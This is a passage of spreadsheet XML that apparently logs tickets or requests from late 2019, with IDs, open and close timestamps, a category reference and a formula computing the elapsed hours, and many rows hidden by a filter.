        <v>14736</v>
      </c>
      <c r="C8" t="s">
        <v>833</v>
      </c>
      <c r="D8" t="s">
        <v>7</v>
      </c>
      <c r="E8" s="1">
        <v>43755.679155092592</v>
      </c>
      <c r="F8" s="1">
        <v>43756.362754629627</v>
      </c>
      <c r="G8" t="s">
        <v>51</v>
      </c>
      <c r="H8" t="str">
        <f>TEXT(F8-E8,"[h]")</f>
        <v>16</v>
      </c>
    </row>
    <row r="9" spans="1:8" hidden="1">
      <c r="A9" t="s">
        <v>834</v>
      </c>
      <c r="B9">
        <v>14725</v>
      </c>
      <c r="C9" t="s">
        <v>835</v>
      </c>
      <c r="D9" t="s">
        <v>7</v>
      </c>
      <c r="E9" s="1">
        <v>43754.335046296299</v>
      </c>
      <c r="F9" s="1">
        <v>43754.648321759261</v>
      </c>
      <c r="G9" t="s">
        <v>174</v>
      </c>
      <c r="H9" t="str">
        <f>TEXT(F9-E9,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="10" spans="1:8" hidden="1">
      <c r="A10" t="s">
        <v>836</v>
      </c>
      <c r="B10">
        <v>14723</v>
      </c>
      <c r="C10" t="s">
        <v>837</v>
      </c>
      <c r="D10" t="s">
        <v>7</v>
      </c>
      <c r="E10" s="1">
        <v>43754.010578703703</v>
      </c>
      <c r="F10" s="1">
        <v>43756.366273148145</v>
      </c>
      <c r="G10" t="s">
        <v>51</v>
      </c>
      <c r="H10" t="str">
        <f>TEXT(F10-E10,"[h]")</f>
        <v>56</v>
      </c>
    </row>
    <row r="11" spans="1:8" hidden="1">
      <c r="A11" t="s">
        <v>838</v>
      </c>
      <c r="B11">
        <v>14720</v>
      </c>
      <c r="C11" t="s">
        <v>839</v>
      </c>
      <c r="D11" t="s">
        <v>7</v>
      </c>
      <c r="E11" s="1">
        <v>43753.93886574074</v>
      </c>
      <c r="F11" s="1">
        <v>43756.370763888888</v>
      </c>
      <c r="G11" t="s">
        <v>840</v>
      </c>
      <c r="H11" t="str">
        <f>TEXT(F11-E11,"[h]")</f>
        <v>58</v>
      </c>
    </row>
    <row r="12" spans="1:8" hidden="1">
      <c r="A12" t="s">
        <v>841</v>
      </c>
      <c r="B12">
        <v>14717</v>
      </c>
      <c r="C12" t="s">
        <v>842</v>
      </c>
      <c r="D12" t="s">
        <v>7</v>
      </c>
      <c r="E12" s="1">
        <v>43753.900914351849</v>
      </c>
      <c r="F12" s="1">
        <v>43754.019768518519</v>
      </c>
      <c r="G12" t="s">
        <v>843</v>
      </c>
      <c r="H12" t="str">
        <f>TEXT(F12-E12,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="13" spans="1:8" hidden="1">
      <c r="A13" t="s">
        <v>844</v>
      </c>
      <c r="B13">
        <v>14714</v>
      </c>
      <c r="C13" t="s">
        <v>845</v>
      </c>
      <c r="D13" t="s">
        <v>7</v>
      </c>
      <c r="E13" s="1">
        <v>43753.837222222224</v>
      </c>
      <c r="F13" s="1">
        <v>43753.875717592593</v>
      </c>
      <c r="G13" t="s">
        <v>846</v>
      </c>
      <c r="H13" t="str">
        <f>TEXT(F13-E13,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:8">
      <c r="A14" t="s">
        <v>847</v>
      </c>
      <c r="B14">
        <v>14713</v>
      </c>
      <c r="C14" t="s">
        <v>848</v>
      </c>
      <c r="D14" t="s">
        <v>7</v>
      </c>
      <c r="E14" s="1">
        <v>43753.810532407406</v>
      </c>
      <c r="F14" s="1">
        <v>43753.875717592593</v>
      </c>
      <c r="G14" t="s">
        <v>849</v>
      </c>
      <c r="H14" t="str">
        <f>TEXT(F14-E14,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:8" hidden="1">
      <c r="A15" t="s">
        <v>850</v>
      </c>
      <c r="B15">
        <v>14711</v>
      </c>
      <c r="C15" t="s">
        <v>851</v>
      </c>
      <c r="D15" t="s">
        <v>7</v>
      </c>
      <c r="E15" s="1">
        <v>43753.753275462965</v>
      </c>
      <c r="F15" s="1">
        <v>43753.796111111114</v>
      </c>
      <c r="G15" t="s">
        <v>852</v>
      </c>
      <c r="H15" t="str">
        <f>TEXT(F15-E15,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="16" spans="1:8" hidden="1">
      <c r="A16" t="s">
        <v>853</v>
      </c>
      <c r="B16">
        <v>14710</v>
      </c>
      <c r="C16" t="s">
        <v>854</v>
      </c>
      <c r="D16" t="s">
        <v>7</v>
      </c>
      <c r="E16" s="1">
        <v>43753.748865740738</v>
      </c>
      <c r="F16" s="1">
        <v>43753.854097222225</v>
      </c>
      <c r="G16" t="s">
        <v>201</v>
      </c>
      <c r="H16" t="str">
        <f>TEXT(F16-E16,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="17" spans="1:8" hidden="1">
      <c r="A17" t="s">
        <v>855</v>
      </c>
      <c r="B17">
        <v>14705</v>
      </c>
      <c r="C17" t="s">
        <v>856</v>
      </c>
      <c r="D17" t="s">
        <v>7</v>
      </c>
      <c r="E17" s="1">
        <v>43753.714699074073</v>
      </c>
      <c r="F17" s="1">
        <v>43753.835717592592</v>
      </c>
      <c r="G17" t="s">
        <v>66</v>
      </c>
      <c r="H17" t="str">
        <f>TEXT(F17-E17,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="18" spans="1:8" hidden="1">
      <c r="A18" t="s">
        <v>857</v>
      </c>
      <c r="B18">
        <v>14704</v>
      </c>
      <c r="C18" t="s">
        <v>858</v>
      </c>
      <c r="D18" t="s">
        <v>7</v>
      </c>
      <c r="E18" s="1">
        <v>43753.709398148145</v>
      </c>
      <c r="F18" s="1">
        <v>43753.810601851852</v>
      </c>
      <c r="G18" t="s">
        <v>859</v>
      </c>
      <c r="H18" t="str">
        <f>TEXT(F18-E18,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="19" spans="1:8" hidden="1">
      <c r="A19" t="s">
        <v>860</v>
      </c>
      <c r="B19">
        <v>14703</v>
      </c>
      <c r="C19" t="s">
        <v>861</v>
      </c>
      <c r="D19" t="s">
        <v>7</v>
      </c>
      <c r="E19" s="1">
        <v>43753.684884259259</v>
      </c>
      <c r="F19" s="1">
        <v>43753.724062499998</v>
      </c>
      <c r="G19" t="s">
        <v>55</v>
      </c>
      <c r="H19" t="str">
        <f>TEXT(F19-E19,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="20" spans="1:8" hidden="1">
      <c r="A20" t="s">
        <v>862</v>
      </c>
      <c r="B20">
        <v>14699</v>
      </c>
      <c r="C20" t="s">
        <v>863</v>
      </c>
      <c r="D20" t="s">
        <v>7</v>
      </c>
      <c r="E20" s="1">
        <v>43753.294189814813</v>
      </c>
      <c r="F20" s="1">
        <v>43756.371782407405</v>
      </c>
      <c r="G20" t="s">
        <v>66</v>
      </c>
      <c r="H20" t="str">
        <f>TEXT(F20-E20,"[h]")</f>
        <v>73</v>
      </c>
    </row>
    <row r="21" spans="1:8" hidden="1">
      <c r="A21" t="s">
        <v>864</v>
      </c>
      <c r="B21">
        <v>14698</v>
      </c>
      <c r="C21" t="s">
        <v>865</v>
      </c>
      <c r="D21" t="s">
        <v>7</v>
      </c>
      <c r="E21" s="1">
        <v>43753.096076388887</v>
      </c>
      <c r="F21" s="1">
        <v>43756.507719907408</v>
      </c>
      <c r="G21" t="s">
        <v>552</v>
      </c>
      <c r="H21" t="str">
        <f>TEXT(F21-E21,"[h]")</f>
        <v>81</v>
      </c>
    </row>
    <row r="22" spans="1:8" hidden="1">
      <c r="A22" t="s">
        <v>866</v>
      </c>
      <c r="B22">
        <v>14697</v>
      </c>
      <c r="C22" t="s">
        <v>867</v>
      </c>
      <c r="D22" t="s">
        <v>7</v>
      </c>
      <c r="E22" s="1">
        <v>43753.064803240741</v>
      </c>
      <c r="F22" s="1">
        <v>43753.724062499998</v>
      </c>
      <c r="G22" t="s">
        <v>55</v>
      </c>
      <c r="H22" t="str">
        <f>TEXT(F22-E22,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="23" spans="1:8" hidden="1">
      <c r="A23" t="s">
        <v>868</v>
      </c>
      <c r="B23">
        <v>14696</v>
      </c>
      <c r="C23" t="s">
        <v>869</v>
      </c>
      <c r="D23" t="s">
        <v>7</v>
      </c>
      <c r="E23" s="1">
        <v>43752.695555555554</v>
      </c>
      <c r="F23" s="1">
        <v>43752.866388888891</v>
      </c>
      <c r="G23" t="s">
        <v>51</v>
      </c>
      <c r="H23" t="str">
        <f>TEXT(F23-E23,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="24" spans="1:8">
      <c r="A24" t="s">
        <v>870</v>
      </c>
      <c r="B24">
        <v>14693</v>
      </c>
      <c r="C24" t="s">
        <v>871</v>
      </c>
      <c r="D24" t="s">
        <v>7</v>
      </c>
      <c r="E24" s="1">
        <v>43752.092870370368</v>
      </c>
      <c r="F24" s="1">
        <v>43758.141145833331</v>
      </c>
      <c r="G24" t="s">
        <v>872</v>
      </c>
      <c r="H24" t="str">
        <f>TEXT(F24-E24,"[h]")</f>
        <v>145</v>
      </c>
    </row>
    <row r="25" spans="1:8">
      <c r="A25" t="s">
        <v>873</v>
      </c>
      <c r="B25">
        <v>14692</v>
      </c>
      <c r="C25" t="s">
        <v>874</v>
      </c>
      <c r="D25" t="s">
        <v>7</v>
      </c>
      <c r="E25" s="1">
        <v>43752.089201388888</v>
      </c>
      <c r="F25" s="1">
        <v>43758.141145833331</v>
      </c>
      <c r="G25" t="s">
        <v>875</v>
      </c>
      <c r="H25" t="str">
        <f>TEXT(F25-E25,"[h]")</f>
        <v>145</v>
      </c>
    </row>
    <row r="26" spans="1:8">
      <c r="A26" t="s">
        <v>876</v>
      </c>
      <c r="B26">
        <v>14686</v>
      </c>
      <c r="C26" t="s">
        <v>877</v>
      </c>
      <c r="D26" t="s">
        <v>7</v>
      </c>
      <c r="E26" s="1">
        <v>43750.724652777775</v>
      </c>
      <c r="F26" s="1">
        <v>43750.749456018515</v>
      </c>
      <c r="G26" t="s">
        <v>98</v>
      </c>
      <c r="H26" t="str">
        <f>TEXT(F26-E26,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" spans="1:8" hidden="1">
      <c r="A27" t="s">
        <v>878</v>
      </c>
      <c r="B27">
        <v>14682</v>
      </c>
      <c r="C27" t="s">
        <v>879</v>
      </c>
      <c r="D27" t="s">
        <v>7</v>
      </c>
      <c r="E27" s="1">
        <v>43749.757395833331</v>
      </c>
      <c r="F27" s="1">
        <v>43752.812094907407</v>
      </c>
      <c r="G27" t="s">
        <v>880</v>
      </c>
      <c r="H27" t="str">
        <f>TEXT(F27-E27,"[h]")</f>
        <v>73</v>
      </c>
    </row>
    <row r="28" spans="1:8" hidden="1">
      <c r="A28" t="s">
        <v>881</v>
      </c>
      <c r="B28">
        <v>14681</v>
      </c>
      <c r="C28" t="s">
        <v>882</v>
      </c>
      <c r="D28" t="s">
        <v>7</v>
      </c>
      <c r="E28" s="1">
        <v>43749.742129629631</v>
      </c>
      <c r="F28" s="1">
        <v>43754.324305555558</v>
      </c>
      <c r="G28" t="s">
        <v>883</v>
      </c>
      <c r="H28" t="str">
        <f>TEXT(F28-E28,"[h]")</f>
        <v>109</v>
      </c>
    </row>
    <row r="29" spans="1:8" hidden="1">
      <c r="A29" t="s">
        <v>884</v>
      </c>
      <c r="B29">
        <v>14663</v>
      </c>
      <c r="C29" t="s">
        <v>885</v>
      </c>
      <c r="D29" t="s">
        <v>7</v>
      </c>
      <c r="E29" s="1">
        <v>43746.719768518517</v>
      </c>
      <c r="F29" s="1">
        <v>43752.767974537041</v>
      </c>
      <c r="G29" t="s">
        <v>886</v>
      </c>
      <c r="H29" t="str">
        <f>TEXT(F29-E29,"[h]")</f>
        <v>145</v>
      </c>
    </row>
    <row r="30" spans="1:8">
      <c r="A30" t="s">
        <v>887</v>
      </c>
      <c r="B30">
        <v>14662</v>
      </c>
      <c r="C30" t="s">
        <v>888</v>
      </c>
      <c r="D30" t="s">
        <v>7</v>
      </c>
      <c r="E30" s="1">
        <v>43746.630543981482</v>
      </c>
      <c r="F30" s="1">
        <v>43748.368344907409</v>
      </c>
      <c r="G30" t="s">
        <v>189</v>
      </c>
      <c r="H30" t="str">
        <f>TEXT(F30-E30,"[h]")</f>
        <v>41</v>
      </c>
    </row>
    <row r="31" spans="1:8" hidden="1">
      <c r="A31" t="s">
        <v>889</v>
      </c>
      <c r="B31">
        <v>14659</v>
      </c>
      <c r="C31" t="s">
        <v>890</v>
      </c>
      <c r="D31" t="s">
        <v>7</v>
      </c>
      <c r="E31" s="1">
        <v>43746.040046296293</v>
      </c>
      <c r="F31" s="1">
        <v>43746.393113425926</v>
      </c>
      <c r="G31" t="s">
        <v>118</v>
      </c>
      <c r="H31" t="str">
        <f>TEXT(F31-E31,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="32" spans="1:8" hidden="1">
      <c r="A32" t="s">
        <v>891</v>
      </c>
      <c r="B32">
        <v>14656</v>
      </c>
      <c r="C32" t="s">
        <v>892</v>
      </c>
      <c r="D32" t="s">
        <v>7</v>
      </c>
      <c r="E32" s="1">
        <v>43745.634988425925</v>
      </c>
      <c r="F32" s="1">
        <v>43748.809178240743</v>
      </c>
      <c r="G32" t="s">
        <v>846</v>
      </c>
      <c r="H32" t="str">
        <f>TEXT(F32-E32,"[h]")</f>
        <v>76</v>
      </c>
    </row>
    <row r="33" spans="1:8" hidden="1">
      <c r="A33" t="s">
        <v>893</v>
      </c>
      <c r="B33">
        <v>14654</v>
      </c>
      <c r="C33" t="s">
        <v>894</v>
      </c>
      <c r="D33" t="s">
        <v>7</v>
      </c>
      <c r="E33" s="1">
        <v>43745.456597222219</v>
      </c>
      <c r="F33" s="1">
        <v>43745.918113425927</v>
      </c>
      <c r="G33" t="s">
        <v>174</v>
      </c>
      <c r="H33" t="str">
        <f>TEXT(F33-E33,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="34" spans="1:8" hidden="1">
      <c r="A34" t="s">
        <v>895</v>
      </c>
      <c r="B34">
        <v>14653</v>
      </c>
      <c r="C34" t="s">
        <v>896</v>
      </c>
      <c r="D34" t="s">
        <v>7</v>
      </c>
      <c r="E34" s="1">
        <v>43745.456296296295</v>
      </c>
      <c r="F34" s="1">
        <v>43746.62804398148</v>
      </c>
      <c r="G34" t="s">
        <v>174</v>
      </c>
      <c r="H34" t="str">
        <f>TEXT(F34-E34,"[h]")</f>
        <v>28</v>
      </c>
    </row>
    <row r="35" spans="1:8" hidden="1">
      <c r="A35" t="s">
        <v>897</v>
      </c>
      <c r="B35">
        <v>14652</v>
      </c>
      <c r="C35" t="s">
        <v>898</v>
      </c>
      <c r="D35" t="s">
        <v>7</v>
      </c>
      <c r="E35" s="1">
        <v>43745.456041666665</v>
      </c>
      <c r="F35" s="1">
        <v>43746.004363425927</v>
      </c>
      <c r="G35" t="s">
        <v>174</v>
      </c>
      <c r="H35" t="str">
        <f>TEXT(F35-E35,"[h]")</f>
        <v>13</v>
      </c>
    </row>
    <row r="36" spans="1:8" hidden="1">
      <c r="A36" t="s">
        <v>899</v>
      </c>
      <c r="B36">
        <v>14649</v>
      </c>
      <c r="C36" t="s">
        <v>900</v>
      </c>
      <c r="D36" t="s">
        <v>7</v>
      </c>
      <c r="E36" s="1">
        <v>43744.446261574078</v>
      </c>
      <c r="F36" s="1">
        <v>43744.883275462962</v>
      </c>
      <c r="G36" t="s">
        <v>51</v>
      </c>
      <c r="H36" t="str">
        <f>TEXT(F36-E36,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="37" spans="1:8">
      <c r="A37" t="s">
        <v>901</v>
      </c>
      <c r="B37">
        <v>14646</v>
      </c>
      <c r="C37" t="s">
        <v>902</v>
      </c>
      <c r="D37" t="s">
        <v>7</v>
      </c>
      <c r="E37" s="1">
        <v>43743.73170138889</v>
      </c>
      <c r="F37" s="1">
        <v>43748.799537037034</v>
      </c>
      <c r="G37" t="s">
        <v>903</v>
      </c>
      <c r="H37" t="str">
        <f>TEXT(F37-E37,"[h]")</f>
        <v>121</v>
      </c>
    </row>
    <row r="38" spans="1:8">
      <c r="A38" t="s">
        <v>904</v>
      </c>
      <c r="B38">
        <v>14645</v>
      </c>
      <c r="C38" t="s">
        <v>905</v>
      </c>
      <c r="D38" t="s">
        <v>7</v>
      </c>
      <c r="E38" s="1">
        <v>43743.599641203706</v>
      </c>
      <c r="F38" s="1">
        <v>43759.682233796295</v>
      </c>
      <c r="G38" t="s">
        <v>906</v>
      </c>
      <c r="H38" t="str">
        <f>TEXT(F38-E38,"[h]")</f>
        <v>385</v>
      </c>
    </row>
    <row r="39" spans="1:8" hidden="1">
      <c r="A39" t="s">
        <v>907</v>
      </c>
      <c r="B39">
        <v>14634</v>
      </c>
      <c r="C39" t="s">
        <v>908</v>
      </c>
      <c r="D39" t="s">
        <v>7</v>
      </c>
      <c r="E39" s="1">
        <v>43741.531157407408</v>
      </c>
      <c r="F39" s="1">
        <v>43750.601759259262</v>
      </c>
      <c r="G39" t="s">
        <v>909</v>
      </c>
      <c r="H39" t="str">
        <f>TEXT(F39-E39,"[h]")</f>
        <v>217</v>
      </c>
    </row>
    <row r="40" spans="1:8" hidden="1">
      <c r="A40" t="s">
        <v>910</v>
      </c>
      <c r="B40">
        <v>14633</v>
      </c>
      <c r="C40" t="s">
        <v>911</v>
      </c>
      <c r="D40" t="s">
        <v>7</v>
      </c>
      <c r="E40" s="1">
        <v>43741.524050925924</v>
      </c>
      <c r="F40" s="1">
        <v>43750.601759259262</v>
      </c>
      <c r="G40" t="s">
        <v>909</v>
      </c>
      <c r="H40" t="str">
        <f>TEXT(F40-E40,"[h]")</f>
        <v>217</v>
      </c>
    </row>
    <row r="41" spans="1:8" hidden="1">
      <c r="A41" t="s">
        <v>912</v>
      </c>
      <c r="B41">
        <v>14630</v>
      </c>
      <c r="C41" t="s">
        <v>913</v>
      </c>
      <c r="D41" t="s">
        <v>7</v>
      </c>
      <c r="E41" s="1">
        <v>43741.21707175926</v>
      </c>
      <c r="F41" s="1">
        <v>43750.038240740738</v>
      </c>
      <c r="G41" t="s">
        <v>138</v>
      </c>
      <c r="H41" t="str">
        <f>TEXT(F41-E41,"[h]")</f>
        <v>211</v>
      </c>
    </row>
    <row r="42" spans="1:8" hidden="1">
      <c r="A42" t="s">
        <v>914</v>
      </c>
      <c r="B42">
        <v>14629</v>
      </c>
      <c r="C42" t="s">
        <v>915</v>
      </c>
      <c r="D42" t="s">
        <v>7</v>
      </c>
      <c r="E42" s="1">
        <v>43741.215682870374</v>
      </c>
      <c r="F42" s="1">
        <v>43756.385416666664</v>
      </c>
      <c r="G42" t="s">
        <v>916</v>
      </c>
      <c r="H42" t="str">
        <f>TEXT(F42-E42,"[h]")</f>
        <v>364</v>
      </c>
    </row>
    <row r="43" spans="1:8" hidden="1">
      <c r="A43" t="s">
        <v>917</v>
      </c>
      <c r="B43">
        <v>14615</v>
      </c>
      <c r="C43" t="s">
        <v>918</v>
      </c>
      <c r="D43" t="s">
        <v>7</v>
      </c>
      <c r="E43" s="1">
        <v>43738.692743055559</v>
      </c>
      <c r="F43" s="1">
        <v>43738.919259259259</v>
      </c>
      <c r="G43" t="s">
        <v>919</v>
      </c>
      <c r="H43" t="str">
        <f>TEXT(F43-E43,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="44" spans="1:8" hidden="1">
      <c r="A44" t="s">
        <v>920</v>
      </c>
      <c r="B44">
        <v>14614</v>
      </c>
      <c r="C44" t="s">
        <v>921</v>
      </c>
      <c r="D44" t="s">
        <v>7</v>
      </c>
      <c r="E44" s="1">
        <v>43738.435347222221</v>
      </c>
      <c r="F44" s="1">
        <v>43739.737673611111</v>
      </c>
      <c r="G44" t="s">
        <v>919</v>
      </c>
      <c r="H44" t="str">
        <f>TEXT(F44-E44,"[h]")</f>
        <v>31</v>
      </c>
    </row>
    <row r="45" spans="1:8" hidden="1">
      <c r="A45" t="s">
        <v>922</v>
      </c>
      <c r="B45">
        <v>14611</v>
      </c>
      <c r="C45" t="s">
        <v>923</v>
      </c>
      <c r="D45" t="s">
        <v>7</v>
      </c>
      <c r="E45" s="1">
        <v>43737.358078703706</v>
      </c>
      <c r="F45" s="1">
        <v>43741.355879629627</v>
      </c>
      <c r="G45" t="s">
        <v>174</v>
      </c>
      <c r="H45" t="str">
        <f>TEXT(F45-E45,"[h]")</f>
        <v>95</v>
      </c>
    </row>
    <row r="46" spans="1:8" hidden="1">
      <c r="A46" t="s">
        <v>924</v>
      </c>
      <c r="B46">
        <v>14608</v>
      </c>
      <c r="C46" t="s">
        <v>925</v>
      </c>
      <c r="D46" t="s">
        <v>7</v>
      </c>
      <c r="E46" s="1">
        <v>43735.599710648145</v>
      </c>
      <c r="F46" s="1">
        <v>43755.903101851851</v>
      </c>
      <c r="G46" t="s">
        <v>926</v>
      </c>
      <c r="H46" t="str">
        <f>TEXT(F46-E46,"[h]")</f>
        <v>487</v>
      </c>
    </row>
    <row r="47" spans="1:8">
      <c r="A47" t="s">
        <v>927</v>
      </c>
      <c r="B47">
        <v>14605</v>
      </c>
      <c r="C47" t="s">
        <v>928</v>
      </c>
      <c r="D47" t="s">
        <v>7</v>
      </c>
      <c r="E47" s="1">
        <v>43735.269259259258</v>
      </c>
      <c r="F47" s="1">
        <v>43745.370335648149</v>
      </c>
      <c r="G47" t="s">
        <v>16</v>
      </c>
      <c r="H47" t="str">
        <f>TEXT(F47-E47,"[h]")</f>
        <v>242</v>
      </c>
    </row>
    <row r="48" spans="1:8" hidden="1">
      <c r="A48" t="s">
        <v>929</v>
      </c>
      <c r="B48">
        <v>14601</v>
      </c>
      <c r="C48" t="s">
        <v>930</v>
      </c>
      <c r="D48" t="s">
        <v>7</v>
      </c>
      <c r="E48" s="1">
        <v>43734.942060185182</v>
      </c>
      <c r="F48" s="1">
        <v>43735.118634259263</v>
      </c>
      <c r="G48" t="s">
        <v>831</v>
      </c>
      <c r="H48" t="str">
        <f>TEXT(F48-E48,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="49" spans="1:8" hidden="1">
      <c r="A49" t="s">
        <v>931</v>
      </c>
      <c r="B49">
        <v>14600</v>
      </c>
      <c r="C49" t="s">
        <v>932</v>
      </c>
      <c r="D49" t="s">
        <v>7</v>
      </c>
      <c r="E49" s="1">
        <v>43734.896273148152</v>
      </c>
      <c r="F49" s="1">
        <v>43735.059340277781</v>
      </c>
      <c r="G49" t="s">
        <v>831</v>
      </c>
      <c r="H49" t="str">
        <f>TEXT(F49-E49,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="50" spans="1:8" hidden="1">
      <c r="A50" t="s">
        <v>933</v>
      </c>
      <c r="B50">
        <v>14595</v>
      </c>
      <c r="C50" t="s">
        <v>934</v>
      </c>
      <c r="D50" t="s">
        <v>7</v>
      </c>
      <c r="E50" s="1">
        <v>43734.039004629631</v>
      </c>
      <c r="F50" s="1">
        <v>43734.049733796295</v>
      </c>
      <c r="G50" t="s">
        <v>51</v>
      </c>
      <c r="H50" t="str">
        <f>TEXT(F50-E50,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" spans="1:8" hidden="1">
      <c r="A51" t="s">
        <v>935</v>
      </c>
      <c r="B51">
        <v>14591</v>
      </c>
      <c r="C51" t="s">
        <v>936</v>
      </c>
      <c r="D51" t="s">
        <v>7</v>
      </c>
      <c r="E51" s="1">
        <v>43733.451724537037</v>
      </c>
      <c r="F51" s="1">
        <v>43753.717743055553</v>
      </c>
      <c r="G51" t="s">
        <v>118</v>
      </c>
      <c r="H51" t="str">
        <f>TEXT(F51-E51,"[h]")</f>
        <v>486</v>
      </c>
    </row>
    <row r="52" spans="1:8">
      <c r="A52" t="s">
        <v>937</v>
      </c>
      <c r="B52">
        <v>14586</v>
      </c>
      <c r="C52" t="s">
        <v>938</v>
      </c>
      <c r="D52" t="s">
        <v>7</v>
      </c>
      <c r="E52" s="1">
        <v>43732.54787037037</v>
      </c>
      <c r="F52" s="1">
        <v>43741.303379629629</v>
      </c>
      <c r="G52" t="s">
        <v>25</v>
      </c>
      <c r="H52" t="str">
        <f>TEXT(F52-E52,"[h]")</f>
        <v>210</v>
      </c>
    </row>
    <row r="53" spans="1:8">
      <c r="A53" t="s">
        <v>939</v>
      </c>
      <c r="B53">
        <v>14585</v>
      </c>
      <c r="C53" t="s">
        <v>940</v>
      </c>
      <c r="D53" t="s">
        <v>7</v>
      </c>
      <c r="E53" s="1">
        <v>43731.838194444441</v>
      </c>
      <c r="F53" s="1">
        <v>43733.81521990741</v>
      </c>
      <c r="G53" t="s">
        <v>25</v>
      </c>
      <c r="H53" t="str">
        <f>TEXT(F53-E53,"[h]")</f>
        <v>47</v>
      </c>
    </row>
    <row r="54" spans="1:8" hidden="1">
      <c r="A54" t="s">
        <v>941</v>
      </c>
      <c r="B54">
        <v>14583</v>
      </c>
      <c r="C54" t="s">
        <v>942</v>
      </c>
      <c r="D54" t="s">
        <v>7</v>
      </c>
      <c r="E54" s="1">
        <v>43731.410509259258</v>
      </c>
      <c r="F54" s="1">
        <v>43734.692199074074</v>
      </c>
      <c r="G54" t="s">
        <v>201</v>
      </c>
      <c r="H54" t="str">
        <f>TEXT(F54-E54,"[h]")</f>
        <v>78</v>
      </c>
    </row>
    <row r="55" spans="1:8" hidden="1">
      <c r="A55" t="s">
        <v>943</v>
      </c>
      <c r="B55">
        <v>14579</v>
      </c>
      <c r="C55" t="s">
        <v>944</v>
      </c>
      <c r="D55" t="s">
        <v>7</v>
      </c>
      <c r="E55" s="1">
        <v>43731.236898148149</v>
      </c>
      <c r="F55" s="1">
        <v>43731.281585648147</v>
      </c>
      <c r="G55" t="s">
        <v>945</v>
      </c>
      <c r="H55" t="str">
        <f>TEXT(F55-E55,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="56" spans="1:8" hidden="1">
      <c r="A56" t="s">
        <v>949</v>
      </c>
      <c r="B56">
        <v>14576</v>
      </c>
      <c r="C56" t="s">
        <v>950</v>
      </c>
      <c r="D56" t="s">
        <v>7</v>
      </c>
      <c r="E56" s="1">
        <v>43730.581354166665</v>
      </c>
      <c r="F56" s="1">
        <v>43733.566712962966</v>
      </c>
      <c r="G56" t="s">
        <v>51</v>
      </c>
      <c r="H56" t="str">
        <f>TEXT(F56-E56,"[h]")</f>
        <v>71</v>
      </c>
    </row>
    <row r="57" spans="1:8" hidden="1">
      <c r="A57" t="s">
        <v>951</v>
      </c>
      <c r="B57">
        <v>14573</v>
      </c>
      <c r="C57" t="s">
        <v>952</v>
      </c>
      <c r="D57" t="s">
        <v>7</v>
      </c>
      <c r="E57" s="1">
        <v>43730.159988425927</v>
      </c>
      <c r="F57" s="1">
        <v>43733.83121527778</v>
      </c>
      <c r="G57" t="s">
        <v>953</v>
      </c>
      <c r="H57" t="str">
        <f>TEXT(F57-E57,"[h]")</f>
        <v>88</v>
      </c>
    </row>
    <row r="58" spans="1:8">
      <c r="A58" t="s">
        <v>954</v>
      </c>
      <c r="B58">
        <v>14570</v>
      </c>
      <c r="C58" t="s">
        <v>955</v>
      </c>
      <c r="D58" t="s">
        <v>7</v>
      </c>
      <c r="E58" s="1">
        <v>43729.859212962961</v>
      </c>
      <c r="F58" s="1">
        <v>43729.887280092589</v>
      </c>
      <c r="G58" t="s">
        <v>160</v>
      </c>
      <c r="H58" t="str">
        <f>TEXT(F58-E58,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="59" spans="1:8">
      <c r="A59" t="s">
        <v>956</v>
      </c>
      <c r="B59">
        <v>14568</v>
      </c>
      <c r="C59" t="s">
        <v>957</v>
      </c>
      <c r="D59" t="s">
        <v>7</v>
      </c>
      <c r="E59" s="1">
        <v>43729.708726851852</v>
      </c>
      <c r="F59" s="1">
        <v>43730.605532407404</v>
      </c>
      <c r="G59" t="s">
        <v>958</v>
      </c>
      <c r="H59" t="str">
        <f>TEXT(F59-E59,"[h]")</f>
        <v>21</v>
      </c>
    </row>
    <row r="60" spans="1:8" hidden="1">
      <c r="A60" t="s">
        <v>959</v>
      </c>
      <c r="B60">
        <v>14567</v>
      </c>
      <c r="C60" t="s">
        <v>960</v>
      </c>
      <c r="D60" t="s">
        <v>7</v>
      </c>
      <c r="E60" s="1">
        <v>43729.540347222224</v>
      </c>
      <c r="F60" s="1">
        <v>43729.725069444445</v>
      </c>
      <c r="G60" t="s">
        <v>333</v>
      </c>
      <c r="H60" t="str">
        <f>TEXT(F60-E60,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="61" spans="1:8" hidden="1">
      <c r="A61" t="s">
        <v>961</v>
      </c>
      <c r="B61">
        <v>14565</v>
      </c>
      <c r="C61" t="s">
        <v>962</v>
      </c>
      <c r="D61" t="s">
        <v>7</v>
      </c>
      <c r="E61" s="1">
        <v>43729.410150462965</v>
      </c>
      <c r="F61" s="1">
        <v>43741.552893518521</v>
      </c>
      <c r="G61" t="s">
        <v>963</v>
      </c>
      <c r="H61" t="str">
        <f>TEXT(F61-E61,"[h]")</f>
        <v>291</v>
      </c>
    </row>
    <row r="62" spans="1:8" hidden="1">
      <c r="B62">
        <v>14564</v>
      </c>
      <c r="C62" t="s">
        <v>964</v>
      </c>
      <c r="D62" t="s">
        <v>7</v>
      </c>
      <c r="E62" s="1">
        <v>43729.234016203707</v>
      </c>
      <c r="F62" s="1">
        <v>43729.255127314813</v>
      </c>
      <c r="G62" t="s">
        <v>174</v>
      </c>
      <c r="H62" t="str">
        <f>TEXT(F62-E62,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="63" spans="1:8" hidden="1">
